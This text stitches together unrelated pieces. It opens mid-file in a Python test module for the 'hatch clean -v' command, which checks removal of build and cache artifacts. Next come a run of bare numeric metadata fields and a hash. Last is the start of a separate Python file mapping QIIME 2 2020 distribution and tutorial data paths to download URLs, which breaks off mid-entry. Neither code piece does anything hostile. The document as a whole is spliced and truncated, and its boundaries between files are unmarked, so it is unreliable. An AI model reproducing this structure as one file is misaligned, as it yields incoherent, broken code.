        create_file(os.path.join(root, 'ok', '.cache', 'v', 'cache', 'lastfailed'))
        baseline = find_all_files(root)

        stray = os.path.join(root, '.cache', 'v', 'cache', 'lastfailed')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([os.path.join(root, '.cache'), stray]) + '\n'
        assert removed in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_coverage():
    """`hatch clean -v` removes a root-level `.coverage` file and reports it."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # Nested copy is recorded in the baseline and expected to survive.
        create_file(os.path.join(root, 'ok', '.coverage'))
        baseline = find_all_files(root)

        stray = os.path.join(root, '.coverage')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert 'Removed paths:\n{}\n'.format(stray) in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_eggs():
    """`hatch clean -v` removes a root-level `.eggs` directory and its contents."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # Nested copy is recorded in the baseline and expected to survive.
        create_file(os.path.join(root, 'ok', '.eggs', 'ok.egg'))
        baseline = find_all_files(root)

        stray = os.path.join(root, '.eggs', 'ok.egg')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([os.path.join(root, '.eggs'), stray]) + '\n'
        assert removed in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_tox():
    """`hatch clean -v` removes a root-level `.tox` directory and its contents."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # Nested copy is recorded in the baseline and expected to survive.
        create_file(os.path.join(root, 'ok', '.tox', 'dist', 'ok.zip'))
        baseline = find_all_files(root)

        stray = os.path.join(root, '.tox', 'dist', 'ok.zip')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([os.path.join(root, '.tox'), stray]) + '\n'
        assert removed in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_build():
    """`hatch clean -v` removes a root-level `build` directory and its contents."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # Nested copy is recorded in the baseline and expected to survive.
        create_file(os.path.join(root, 'ok', 'build', 'lib', 'ok', 'ok.py'))
        baseline = find_all_files(root)

        stray = os.path.join(root, 'build', 'lib', 'ok', 'ok.py')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([os.path.join(root, 'build'), stray]) + '\n'
        assert removed in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_dist():
    """`hatch clean -v` removes a root-level `dist` directory and its contents."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # Nested copy is recorded in the baseline and expected to survive.
        create_file(os.path.join(root, 'ok', 'dist', 'ok.whl'))
        baseline = find_all_files(root)

        stray = os.path.join(root, 'dist', 'ok.whl')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([os.path.join(root, 'dist'), stray]) + '\n'
        assert removed in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_egg_info():
    """`hatch clean -v` removes a root-level `*.egg-info` directory."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # Nested copy is recorded in the baseline and expected to survive.
        create_file(os.path.join(root, 'ok', 'ok.egg-info', 'PKG-INFO'))
        baseline = find_all_files(root)

        stray = os.path.join(root, 'ok.egg-info', 'PKG-INFO')
        create_file(stray)
        assert os.path.exists(stray)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([os.path.join(root, 'ok.egg-info'), stray]) + '\n'
        assert removed in result.output
        assert not os.path.exists(stray)
        assert_files_exist(baseline)
def test_pycache():
    """`hatch clean -v` removes `__pycache__` dirs at the root and in subdirectories."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        baseline = find_all_files(root)

        top_dir = os.path.join(root, '__pycache__')
        nested_dir = os.path.join(root, 'ok', '__pycache__')
        top = os.path.join(top_dir, 'ok.txt')
        nested = os.path.join(nested_dir, 'ok.txt')
        for path in (top, nested):
            create_file(path)
            assert os.path.exists(path)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        removed = 'Removed paths:\n' + '\n'.join([top_dir, top, nested_dir, nested]) + '\n'
        assert removed in result.output
        for path in (top, nested):
            assert not os.path.exists(path)
        assert_files_exist(baseline)
def test_pyc():
    """`hatch clean -v` deletes `*.pyc` files at the root and in subdirectories."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        baseline = find_all_files(root)

        top = os.path.join(root, 'ok.pyc')
        nested = os.path.join(root, 'ok', 'ko.pyc')
        for path in (top, nested):
            create_file(path)
            assert os.path.exists(path)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert 'Removed paths:\n' + '\n'.join([top, nested]) + '\n' in result.output
        for path in (top, nested):
            assert not os.path.exists(path)
        assert_files_exist(baseline)
def test_pyd():
    """`hatch clean -v` deletes `*.pyd` files at the root and in subdirectories."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        baseline = find_all_files(root)

        top = os.path.join(root, 'ok.pyd')
        nested = os.path.join(root, 'ok', 'ko.pyd')
        for path in (top, nested):
            create_file(path)
            assert os.path.exists(path)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert 'Removed paths:\n' + '\n'.join([top, nested]) + '\n' in result.output
        for path in (top, nested):
            assert not os.path.exists(path)
        assert_files_exist(baseline)
def test_pyo():
    """`hatch clean -v` deletes `*.pyo` files at the root and in subdirectories."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        baseline = find_all_files(root)

        top = os.path.join(root, 'ok.pyo')
        nested = os.path.join(root, 'ok', 'ko.pyo')
        for path in (top, nested):
            create_file(path)
            assert os.path.exists(path)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert 'Removed paths:\n' + '\n'.join([top, nested]) + '\n' in result.output
        for path in (top, nested):
            assert not os.path.exists(path)
        assert_files_exist(baseline)
def test_verbose_already_clean():
    """With nothing to remove, `hatch clean -v` reports 'Already clean!'."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        baseline = find_all_files(root)

        result = runner.invoke(hatch, ['clean', '-v'])

        assert result.exit_code == 0
        assert 'Already clean!' in result.output
        assert_files_exist(baseline)
| 30.505344
| 82
| 0.567889
| 2,592
| 19,981
| 4.190586
| 0.046682
| 0.078991
| 0.082858
| 0.061775
| 0.920641
| 0.904345
| 0.895323
| 0.888234
| 0.883263
| 0.874885
| 0
| 0.006547
| 0.289125
| 19,981
| 654
| 83
| 30.551988
| 0.758167
| 0
| 0
| 0.795322
| 0
| 0
| 0.095891
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 1
| 0.054581
| false
| 0
| 0.011696
| 0.001949
| 0.068226
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ec9b5eea12cbb777e5c7d083e3a01c73421c8f4
| 63,163
|
py
|
Python
|
urls/_2020.py
|
Keegan-Evans/data302
|
b4e94b8c21953ec8d71089eab9c3284ce67437ce
|
[
"BSD-3-Clause"
] | null | null | null |
urls/_2020.py
|
Keegan-Evans/data302
|
b4e94b8c21953ec8d71089eab9c3284ce67437ce
|
[
"BSD-3-Clause"
] | 10
|
2019-10-25T19:10:14.000Z
|
2021-04-28T17:19:50.000Z
|
urls/_2020.py
|
Keegan-Evans/data302
|
b4e94b8c21953ec8d71089eab9c3284ce67437ce
|
[
"BSD-3-Clause"
] | 5
|
2020-01-16T15:37:00.000Z
|
2021-04-28T17:20:35.000Z
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
# flake8: noqa
MAP_2020 = {
# 2020.2 DISTRO
'distro/core/qiime2-2020.2-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.2/release/qiime2-2020.2-py36-osx-conda.yml',
'distro/core/qiime2-2020.2-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.2/release/qiime2-2020.2-py36-linux-conda.yml',
'distro/core/2020.2':
'https://s3-us-west-2.amazonaws.com/qiime2-data/distro/core/qiime20202-1583437267.zip',
'distro/core/qiime20202-1583437267.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/distro/core/qiime20202-1583437267.zip',
# 2020.6 DISTRO
'distro/core/qiime2-2020.6-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.6/release/qiime2-2020.6-py36-osx-conda.yml',
'distro/core/qiime2-2020.6-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.6/release/qiime2-2020.6-py36-linux-conda.yml',
'distro/core/2020.6':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20206-1594241581.zip',
'distro/core/qiime20206-1594241581.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20206-1594241581.zip',
# 2020.8 DISTRO
'distro/core/qiime2-2020.8-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.8/release/qiime2-2020.8-py36-osx-conda.yml',
'distro/core/qiime2-2020.8-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.8/release/qiime2-2020.8-py36-linux-conda.yml',
'distro/core/2020.8':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20208-1598972704.zip',
'distro/core/qiime20208-1598972704.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime20208-1598972704.zip',
# 2020.11 DISTRO
'distro/core/qiime2-2020.11-py36-osx-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.11/release/qiime2-2020.11-py36-osx-conda.yml',
'distro/core/qiime2-2020.11-py36-linux-conda.yml':
'https://raw.githubusercontent.com/qiime2/environment-files/master/2020.11/release/qiime2-2020.11-py36-linux-conda.yml',
'distro/core/2020.11':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime202011-1607704676.zip',
'distro/core/qiime202011-1607704676.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/distro/core/qiime202011-1607704676.zip',
# 2020.2
'2020.2/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.2/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/gg-13-8-99-nb-classifier.qza',
'2020.2/common/silva-132-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/silva-132-99-515-806-nb-classifier.qza',
'2020.2/common/silva-132-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/silva-132-99-nb-classifier.qza',
'2020.2/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/sepp-refs-gg-13-8.qza',
'2020.2/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/common/sepp-refs-silva-128.qza',
'2020.2/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.2/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.2/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.2/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.2/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.2/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.2/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/chimera/atacama-table.qza',
'2020.2/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/chimera/atacama-rep-seqs.qza',
'2020.2/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/exporting/feature-table.qza',
'2020.2/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/exporting/unrooted-tree.qza',
'2020.2/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/distance-matrix.qza',
'2020.2/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/table.qza',
'2020.2/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/taxonomy.qza',
'2020.2/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/filtering/sequences.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.2/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.2/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.2/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.2/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/gneiss/sample-metadata.tsv',
'2020.2/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/gneiss/table.qza',
'2020.2/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/gneiss/taxa.qza',
'2020.2/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/aligned-sequences.fna',
'2020.2/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.2/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.2/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/feature-table-v100.biom',
'2020.2/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/feature-table-v210.biom',
'2020.2/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/pe-64-manifest',
'2020.2/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/pe-64.zip',
'2020.2/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/se-33-manifest',
'2020.2/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/se-33.zip',
'2020.2/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/sequences.fna',
'2020.2/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/importing/unrooted-tree.tre',
'2020.2/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.2/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/ecam_shannon.qza',
'2020.2/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.2/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.2/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.2/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.2/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/faith_pd_vector.qza',
'2020.2/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/rep-seqs.qza',
'2020.2/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/taxonomy.qza',
'2020.2/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.2/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/otu-clustering/seqs.fna',
'2020.2/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/otu-clustering/85_otus.qza',
'2020.2/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/pd-mice/animal_distal_gut.qza',
'2020.2/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.2/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/pd-mice/manifest',
'2020.2/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.2/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/pd-mice/ref_tax.qza',
'2020.2/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.2/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.2/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/query-seqs.qza',
'2020.2/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/reference-seqs.qza',
'2020.2/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/quality-control/query-table.qza',
'2020.2/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/read-joining/atacama-seqs.qza',
'2020.2/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/read-joining/fj-joined.zip',
'2020.2/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/sample-classifier/atacama-table.qza',
'2020.2/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.2/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.2/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.2/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.2/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.2/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/phylogeny/rep-seqs.qza',
'2020.2/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/utilities/faith-pd-vector.qza',
'2020.2/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/utilities/jaccard-pcoa.qza',
'2020.2/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.2/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.2/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/1TSFsvAo0aIHnNy-67PlAjXhhGQx6VtXCEzSmV9KeVbc/edit?usp=sharing',
'2020.2/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1TSFsvAo0aIHnNy-67PlAjXhhGQx6VtXCEzSmV9KeVbc/export?gid=0&format=tsv',
## Moving Pictures
'2020.2/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/15HpBuwlUbm6Yg12qOtKOrr2dUM7B2ityv9te7KB7Xq8/edit?usp=sharing',
'2020.2/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/15HpBuwlUbm6Yg12qOtKOrr2dUM7B2ityv9te7KB7Xq8/export?gid=0&format=tsv',
## Atacama
'2020.2/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1AFtHGlLIHy4-hwAyAL0EQUMLvZtONK5bgZ0JSInSRYc/edit?usp=sharing',
'2020.2/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1AFtHGlLIHy4-hwAyAL0EQUMLvZtONK5bgZ0JSInSRYc/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.2/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/19AZnLnTRUG4jz8ICPu4cPhNva3dipvnUXtqCSfZIiyg/edit?usp=sharing',
'2020.2/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vQ68O0P1syi1au1G4u-guxaNNAbUnvCmQYYmEKvWDGt_all3c1HPJ_2j9abEW6bI9YifZcXLlvy5joh/pub?gid=1303657428&single=true&output=tsv',
## FMT Cdiff
'2020.2/tutorials/fmt-cdiff-khanna/sample_metadata':
'https://docs.google.com/spreadsheets/d/1pR29THjgcNMMMCBwwAbfZDD5hHhjNzocBL0V7oroY2g/edit?usp=sharing',
'2020.2/tutorials/fmt-cdiff-khanna/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vQEytlplv_yNjq_d_mTA9Xw-ATgmGqodvau4moKm3q3qCwlmbvjOW9jeO3rdxi7SMEaK8-nZMeF1BSS/pub?gid=283132897&single=true&output=tsv',
## PD Mice
'2020.2/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1EIjwTSWoBjm3HAjuM0oo5VLA6whVxS6YCzVOJE2y3eU/edit?usp=sharing',
'2020.2/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vTUKT61yWMqo0xLFST1cYnIUKOvDm5YMk7i1h-MiJHU84cWkQ8ehvR3xPATMD21ZGkguNiywN98JWG5/pub?gid=1509704122&single=true&output=tsv',
# 2020.6
'2020.6/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.6/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/gg-13-8-99-nb-classifier.qza',
'2020.6/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/sepp-refs-gg-13-8.qza',
'2020.6/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/sepp-refs-silva-128.qza',
'2020.6/common/silva-138-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/silva-138-99-515-806-nb-classifier.qza',
'2020.6/common/silva-138-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/common/silva-138-99-nb-classifier.qza',
'2020.6/common/silva-138-99-seqs-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-seqs-515-806.qza',
'2020.6/common/silva-138-99-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-seqs.qza',
'2020.6/common/silva-138-99-tax-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-tax-515-806.qza',
'2020.6/common/silva-138-99-tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/common/silva-138-99-tax.qza',
'2020.6/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.6/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.6/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.6/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.6/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/atacama-soils/1p/forward.fastq.gz',
